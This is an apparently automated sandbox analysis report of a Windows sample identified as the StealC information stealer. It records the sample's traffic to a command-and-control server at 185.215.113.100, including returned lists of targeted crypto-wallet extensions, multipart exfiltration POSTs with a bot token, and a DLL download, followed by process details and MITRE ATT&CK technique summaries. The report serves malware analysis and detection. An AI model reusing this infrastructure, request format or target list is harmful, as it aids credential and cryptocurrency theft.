Sep 1, 2024 23:02:56.268512964 CEST	1236	IN	Data Raw: 5a 47 70 6b 62 6d 35 76 61 6d 74 69 5a 32 6c 76 61 57 39 6b 59 6d 6c 6a 66 44 46 38 4d 48 77 77 66 45 4e 35 59 57 35 76 49 46 64 68 62 47 78 6c 64 48 78 6b 61 32 52 6c 5a 47 78 77 5a 32 52 74 62 57 74 72 5a 6d 70 68 59 6d 5a 6d 5a 57 64 68 62 6d Data Ascii: ZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWNvY25ramVofDF8MHwwfFRlbXBsZXxvb2tqbGJraWl
Sep 1, 2024 23:02:56.268524885 CEST	1236	IN	Data Raw: 63 79 42 58 59 57 78 73 5a 58 52 38 5a 57 5a 69 5a 32 78 6e 62 32 5a 76 61 58 42 77 59 6d 64 6a 61 6d 56 77 62 6d 68 70 59 6d 78 68 61 57 4a 6a 62 6d 4e 73 5a 32 74 38 4d 58 77 77 66 44 42 38 52 6d 6c 75 62 6d 6c 6c 66 47 4e 71 62 57 74 75 5a 47 Data Ascii: cyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWtuZGpobmFnY2ZicGllbW5rZHBvbWNjbmpibG1qfDF8MHwwfExlYXAgVGVycmEgV2FsbGV0fGFpamNiZWRvaWptZ25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFRyZXpvciBQYXNzd29yZCBNYW5hZ2VyfGltbG9pZmt
Sep 1, 2024 23:02:56.268534899 CEST	672	IN	Data Raw: 59 6d 5a 69 62 6e 42 74 61 57 39 72 5a 6d 70 71 59 57 64 73 59 57 68 74 62 6d 52 6c 5a 48 77 78 66 44 42 38 4d 48 78 61 62 32 68 76 49 46 5a 68 64 57 78 30 66 47 6c 6e 61 33 42 6a 62 32 52 6f 61 57 56 76 62 58 42 6c 62 47 39 75 59 32 5a 75 59 6d Data Ascii: YmZibnBtaW9rZmpqYWdsYWhtbmRlZHwxfDB8MHxab2hvIFZhdWx0fGlna3Bjb2RoaWVvbXBlbG9uY2ZuYmVrY2NpbmhhcGRifDF8MHwwfE9wZXJhIFdhbGxldHxnb2poY2RnY3BicGZpZ2NhZWpwZmhmZWdla2RnaWJsa3wwfDB8MXxUcnVzdCBXYWxsZXR8ZWdqaWRqYnBnbGljaGRjb25kYmNiZG5iZWVwcGdkcGh8MXwwfDB
Sep 1, 2024 23:02:56.269284964 CEST	1236	IN	Data Raw: 4d 58 77 77 66 44 42 38 52 6e 4a 76 62 6e 52 70 5a 58 49 67 56 32 46 73 62 47 56 30 66 47 74 77 63 47 5a 6b 61 57 6c 77 63 47 68 6d 59 32 4e 6c 62 57 4e 70 5a 32 35 6f 61 57 5a 77 61 6d 74 68 63 47 5a 69 61 57 68 6b 66 44 46 38 4d 48 77 77 66 46 Data Ascii: MXwwfDB8RnJvbnRpZXIgV2FsbGV0fGtwcGZkaWlwcGhmY2NlbWNpZ25oaWZwamthcGZiaWhkfDF8MHwwfFNhZmVQYWx8bGdtcGNwZ2xwbmdkb2FsYmdlb2xkZWFqZmNsbmhhZmF8MXwwfDB8U3ViV2FsbGV0IC0gUG9sa2Fkb3QgV2FsbGV0fG9uaG9nZmplYWNuZm9vZmtmZ3BwZGxibWxtbnBsZ2JufDF8MHwwfEZsdXZpIFd
Sep 1, 2024 23:02:56.269296885 CEST	328	IN	Data Raw: 59 6d 4a 77 62 57 68 70 61 47 56 6f 62 57 6c 6f 62 6d 52 74 62 57 4e 6b 59 57 35 68 59 32 39 73 62 6d 68 38 4d 58 77 77 66 44 42 38 51 6d 6c 30 5a 32 56 30 49 46 64 68 62 47 78 6c 64 48 78 71 61 57 6c 6b 61 57 46 68 62 47 6c 6f 62 57 31 6f 5a 47 Data Ascii: YmJwbWhpaGVobWlobmRtbWNkYW5hY29sbmh8MXwwfDB8Qml0Z2V0IFdhbGxldHxqaWlkaWFhbGlobW1oZGRqZ2JuYmdkZmZsZWxvY3Bha3wxfDB8MHxUT04gV2FsbGV0fG5waHBscGdvYWtoaGpjaGtraG1pZ2dha2lqbmtoZm5kfDF8MHwwfE15VG9uV2FsbGV0fGZsZGZwZ2lwZm5jZ25kZm9sY2JrZGVla25iYmJuaGNjfDF
Sep 1, 2024 23:02:56.270522118 CEST	470	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FIEGCBKEGCFCBFIDBFII Host: 185.215.113.100 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 49 45 47 43 42 4b 45 47 43 46 43 42 46 49 44 42 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 36 38 39 37 64 38 39 36 32 36 61 35 38 33 63 31 30 33 64 65 33 64 35 39 37 34 62 62 35 62 61 32 30 36 34 32 63 66 31 32 64 31 37 64 37 32 33 62 36 30 37 34 39 38 64 30 65 39 38 36 35 34 32 37 35 33 61 38 32 37 35 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 47 43 42 4b 45 47 43 46 43 42 46 49 44 42 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 47 43 42 4b 45 47 43 46 43 42 46 49 44 42 46 49 49 2d 2d 0d 0a Data Ascii: ------FIEGCBKEGCFCBFIDBFIIContent-Disposition: form-data; name="token"36897d89626a583c103de3d5974bb5ba20642cf12d17d723b607498d0e986542753a8275------FIEGCBKEGCFCBFIDBFIIContent-Disposition: form-data; name="message"fplugins------FIEGCBKEGCFCBFIDBFII--
Sep 1, 2024 23:02:57.316217899 CEST	335	IN	HTTP/1.1 200 OK Date: Sun, 01 Sep 2024 21:02:56 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Sep 1, 2024 23:02:57.331969023 CEST	203	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIDHJKFBGIIJJKFIJDBG Host: 185.215.113.100 Content-Length: 5727 Connection: Keep-Alive Cache-Control: no-cache
Sep 1, 2024 23:02:57.332015991 CEST	5727	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 4b 46 42 47 49 49 4a 4a 4b 46 49 4a 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 36 38 39 37 64 Data Ascii: ------IIDHJKFBGIIJJKFIJDBGContent-Disposition: form-data; name="token"36897d89626a583c103de3d5974bb5ba20642cf12d17d723b607498d0e986542753a8275------IIDHJKFBGIIJJKFIJDBGContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Sep 1, 2024 23:02:58.882740021 CEST	202	IN	HTTP/1.1 200 OK Date: Sun, 01 Sep 2024 21:02:57 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 1, 2024 23:02:59.155009985 CEST	94	OUT	GET /0d60be0de163924d/sqlite3.dll HTTP/1.1 Host: 185.215.113.100 Cache-Control: no-cache
Sep 1, 2024 23:02:59.442027092 CEST	1236	IN	HTTP/1.1 200 OK Date: Sun, 01 Sep 2024 21:02:59 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Sep 1, 2024 23:02:59.442042112 CEST	164	IN	Data Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 Data Ascii: #N@B/81s:<R@B/92P @B

Target ID:	0
Start time:	17:02:51
Start date:	01/09/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x860000
File size:	1'830'912 bytes
MD5 hash:	69A44AFD5F25F695F1E1FE16ABF56A39
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2544618204.00000000008CA000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2545709966.000000000136E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	17:04:02
Start date:	01/09/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 2800 -s 1544
Imagebase:	0xc10000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\EHJKJDGCGDAKFHIDBGCBKJEHIE

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_455b5ddbe96ff1fb6e298df1c6cfe599588679_6983241a_cd0d6090-ee71-407c-9713-1cba797ca396\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER19B0.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B67.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1C04.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Imports

Windows Analysis Report
file.exe